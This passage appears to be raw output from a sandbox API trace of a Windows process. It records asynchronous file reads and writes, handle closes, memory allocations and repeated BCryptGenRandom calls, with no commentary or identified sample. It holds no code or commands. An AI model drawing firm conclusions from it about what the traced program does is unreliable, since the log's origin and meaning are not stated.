nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.845] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.869] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2c3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.870] CloseHandle (hObject=0x2a8) returned 1 [0180.870] free (_Block=0x1ff1e60) [0180.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.879] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.880] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0180.880] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.880] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0180.881] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.881] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.881] free (_Block=0x3e305b8) [0180.881] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.881] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.881] free (_Block=0x1fa91d0) [0180.881] free (_Block=0x1fa2ed8) [0180.882] free (_Block=0x1fa90b8) [0180.882] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.882] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.882] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.883] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.895] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.895] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.909] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.923] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.933] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.953] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0180.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0180.966] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0181.000] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0181.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0181.044] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x494, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0181.044] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0181.051] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3b9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0181.051] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0181.063] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.063] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0181.064] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.064] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0181.064] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0181.064] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0181.064] free (_Block=0x3e305b8) [0181.064] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0181.064] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0181.065] free (_Block=0x1fa91d0) [0181.065] free (_Block=0x1fa2ed8) [0181.065] free (_Block=0x1fa90b8) [0181.065] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0181.065] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0181.077] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.078] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0181.078] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.078] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0181.079] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0181.079] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0181.079] free (_Block=0x3e305b8) [0181.079] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0181.079] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0181.079] free (_Block=0x1fa91d0) [0181.079] free (_Block=0x1fa2ed8) [0181.079] free (_Block=0x1fa90b8) [0181.079] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0181.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0181.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.094] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0181.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0181.095] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0181.095] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0181.095] free (_Block=0x3e305b8) [0181.095] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0181.095] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0181.096] free (_Block=0x1fa91d0) [0181.096] free (_Block=0x1fa2ed8) [0181.096] free (_Block=0x1fa90b8) [0181.096] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0181.096] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.482] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.483] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0182.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0182.484] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.484] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.484] free (_Block=0x3e305b8) [0182.484] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.484] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.485] free (_Block=0x1fa91d0) [0182.485] free (_Block=0x1fa2ed8) [0182.485] free (_Block=0x1fa90b8) [0182.485] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0182.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0182.487] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0182.487] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.487] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.487] free (_Block=0x3e305b8) [0182.487] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.488] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.488] free (_Block=0x1fa91d0) [0182.488] free (_Block=0x1fa2ed8) [0182.488] free (_Block=0x1fa90b8) [0182.488] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0182.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.492] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x12e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0182.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.642] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0182.642] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.654] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0182.654] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.662] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0182.662] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.676] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0182.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.697] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0182.698] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.713] CloseHandle (hObject=0x3cc) returned 1 [0182.713] free (_Block=0x3df0008) [0182.713] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.726] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2dd, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0182.726] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.726] CloseHandle (hObject=0x3cc) returned 1 [0182.727] free (_Block=0x3df0008) [0182.727] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.735] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x595, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0182.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0182.735] CloseHandle (hObject=0x2a4) returned 1 [0182.735] free (_Block=0x1ff1e60) [0182.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0183.608] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11d1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0183.611] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0183.611] CloseHandle (hObject=0x2a4) returned 1 [0183.611] free (_Block=0x3df0008) [0183.611] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0183.643] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.644] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0183.644] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.644] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0183.645] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0183.645] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0183.645] free (_Block=0x3e305b8) [0183.645] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0183.645] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0183.645] free (_Block=0x1fa91d0) [0183.645] free (_Block=0x1fa2ed8) [0183.645] free (_Block=0x1fa90b8) [0183.645] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0183.646] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0183.657] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.657] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0183.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0183.658] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0183.658] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 